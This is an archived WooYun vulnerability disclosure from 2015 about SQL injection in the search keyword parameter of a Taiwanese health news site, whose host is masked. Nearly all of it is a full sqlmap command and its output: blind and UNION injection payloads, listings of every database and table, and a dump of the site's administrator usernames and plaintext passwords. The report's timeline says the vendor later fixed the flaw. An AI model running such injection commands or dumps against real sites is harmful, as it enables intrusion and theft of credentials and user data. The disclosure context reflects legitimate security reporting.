乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-26: 细节已通知厂商并且等待厂商处理中 2015-11-29: 厂商已经确认,细节仅向厂商公开 2015-12-09: 细节向核心白帽子及相关领域专家公开 2015-12-10: 厂商已经修复漏洞并主动公开,细节向公众公开
健康醫療網是以健康新聞、治療新知為主的全方位健康媒體平台,致力於提供最專業、最即時、最樂活的多元化資訊。 「健康部落格」邀請專業人士論述健康資訊,分享更多更完善的保健知識與服務,成為民眾獲取健康知識的首選網站。健康醫療網特別設立「公益專區」,希望透過網路社群平台,凝聚力量幫助弱勢族群,更期許藉由此媒體發聲,讓愛心遠佈、善盡社會責任。
地址:http://**.**.**.**/search.php?keyword=ZREq
$ python sqlmap.py -u "http://**.**.**.**/search.php?keyword=ZREq" -p keyword --technique=U --random-agent --batch -D healthne_event -T soho_administrators -C AdminID,Username,Password,Email,LastLoginIP --dump
Database: healthne_vhost52412+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| web_count | 9233792 |Database: healthne_vhost52412Table: web_count[5 columns]+--------+------------------+| Column | Type |+--------+------------------+| hot | int(2) || id | int(11) unsigned || pid | varchar(50) || t_time | date || wtype | varchar(10) |+--------+------------------+
Table: soho_administrators[2 entries]+---------+----------+----------+-----------------+-------------+| AdminID | Username | Password | Email | LastLoginIP |+---------+----------+----------+-----------------+-------------+| 1 | vascular | vascular | admin@**.**.**.** | 127.0 || 2 | admin | admin | admin@**.**.**.** | 127.0 |+---------+----------+----------+-----------------+-------------+
---Parameter: keyword (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: keyword=nDtU') AND (SELECT * FROM (SELECT(SLEEP(5)))DoPn) AND ('mNjW'='mNjW Type: UNION query Title: Generic UNION query (NULL) - 34 columns Payload: keyword=nDtU') UNION ALL SELECT CONCAT(0x7170706271,0x78416657475158744a73766b5843756243467873576668457647534f47694f4569697855566d6f59,0x7162706a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web application technology: Apache 2.2.29, PHP 5.4.33back-end DBMS: MySQL 5.0.12current user: 'healthne_portal@localhost'current user is DBA: Falsedatabase management system users [1]:[*] 'healthne_portal'@'localhost'Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 1146 || SESSION_VARIABLES | 331 || GLOBAL_VARIABLES | 319 || GLOBAL_STATUS | 317 || SESSION_STATUS | 317 || COLLATION_CHARACTER_SET_APPLICABILITY | 197 || COLLATIONS | 197 || STATISTICS | 124 || TABLES | 116 || PARTITIONS | 95 || KEY_COLUMN_USAGE | 48 || TABLE_CONSTRAINTS | 48 || CHARACTER_SETS | 39 || SCHEMA_PRIVILEGES | 36 || PLUGINS | 23 || VIEWS | 21 || ENGINES | 9 || PROCESSLIST | 4 || SCHEMATA | 3 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+Database: healthne_event+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| soho_administrators | 2 || soho_member | 1 || soho_system | 1 || soho_vote | 1 |+---------------------------------------+---------+Database: healthne_vhost52412+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| web_count | 9233792 || bbs_repost_backup | 35328 || news_tag | 33432 || ae_hosnav | 26931 || news_data | 23917 || view_announceList | 23917 || login_log | 22138 || news_tag_parse | 21615 || eventVoteHistory | 21466 || ad_data | 6606 || news_data_backup | 5072 || member_data | 2966 || news_revert | 851 || news_class | 586 || bbs_data | 347 || view_bbs_data | 347 || qnaire_a | 341 || sessionsPortal | 305 || bbs_revert | 255 || view_bbs_revert | 255 || contactus_data | 230 || hospitalList | 145 || blog | 105 || view_blog | 105 || user_data | 96 || view_user_data | 96 || faq_data | 94 || view_blog_qa | 94 || branch_role | 89 || view_branch_role | 89 || view_blog_back1 | 83 || eventVoteObject | 82 || qnaire_q | 72 || partner_data | 70 || captcha | 59 || news_special | 42 || photo_data | 34 || sessionsEvent | 18 || bbs_class | 14 || unit_data | 13 || news_rss | 11 || rssClient | 11 || view_actionData | 11 || view_newslist1 | 8 || view_newslist1_bk | 8 || view_newslist2 | 8 || about_data | 7 || photo_class | 7 || cache_blog1_list | 6 || cache_blog2_list | 6 || cache_blog3_list | 6 || view_blog1 | 6 || view_blog2 | 6 || view_blog3 | 6 || admin | 4 || view_newslist4 | 4 || view_newslist3 | 3 || sessionsAdmin | 2 || branch_data | 1 || news_Hspecial | 1 || sys_settings | 1 || view_movie | 1 || view_raido | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: healthne_eventTable: soho_administrators[1 column]+----------+-------------+| Column | Type |+----------+-------------+| Password | varchar(33) |+----------+-------------+Database: healthne_eventTable: soho_administrators[2 entries]+----------+| Password |+----------+| admin || vascular |+----------+sqlmap resumed the following injection point(s) from stored session:---Parameter: keyword (GET) Type: UNION query Title: Generic UNION query (NULL) - 34 columns Payload: keyword=nDtU') UNION ALL SELECT CONCAT(0x7170706271,0x78416657475158744a73766b5843756243467873576668457647534f47694f4569697855566d6f59,0x7162706a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web application technology: Apache 2.2.29, PHP 5.4.33back-end DBMS: MySQL 5.0.12Database: healthne_eventTable: soho_administrators[10 columns]+---------------+------------------+| Column | Type |+---------------+------------------+| AdminID | int(10) unsigned || Competence | text || Competence1 | text || Email | varchar(33) || GroupID | int(11) || LastLoginIP | varchar(5) || LastLoginTime | datetime || Password | varchar(33) || Remarks | varchar(85) || Username | varchar(33) |+---------------+------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: keyword (GET) Type: UNION query Title: Generic UNION query (NULL) - 34 columns Payload: keyword=nDtU') UNION ALL SELECT CONCAT(0x7170706271,0x78416657475158744a73766b5843756243467873576668457647534f47694f4569697855566d6f59,0x7162706a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web application technology: Apache 2.2.29, PHP 5.4.33back-end DBMS: MySQL 5.0.12Database: healthne_eventTable: soho_administrators[2 entries]+---------+----------+----------+-----------------+-------------+| AdminID | Username | Password | Email | LastLoginIP |+---------+----------+----------+-----------------+-------------+| 1 | vascular | vascular | admin@**.**.**.** | 127.0 || 2 | admin | admin | admin@**.**.**.** | 127.0 |+---------+----------+----------+-----------------+-------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: keyword (GET) Type: UNION query Title: Generic UNION query (NULL) - 34 columns Payload: keyword=nDtU') UNION ALL SELECT CONCAT(0x7170706271,0x78416657475158744a73766b5843756243467873576668457647534f47694f4569697855566d6f59,0x7162706a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web application technology: Apache 2.2.29, PHP 5.4.33back-end DBMS: MySQL 5.0.12Database: healthne_vhost52412Table: web_count[5 columns]+--------+------------------+| Column | Type |+--------+------------------+| hot | int(2) || id | int(11) unsigned || pid | varchar(50) || t_time | date || wtype | varchar(10) |+--------+------------------+
上WAF。
危害等级:高
漏洞Rank:16
确认时间:2015-11-29 18:08
感謝通報
2015-12-10:已修正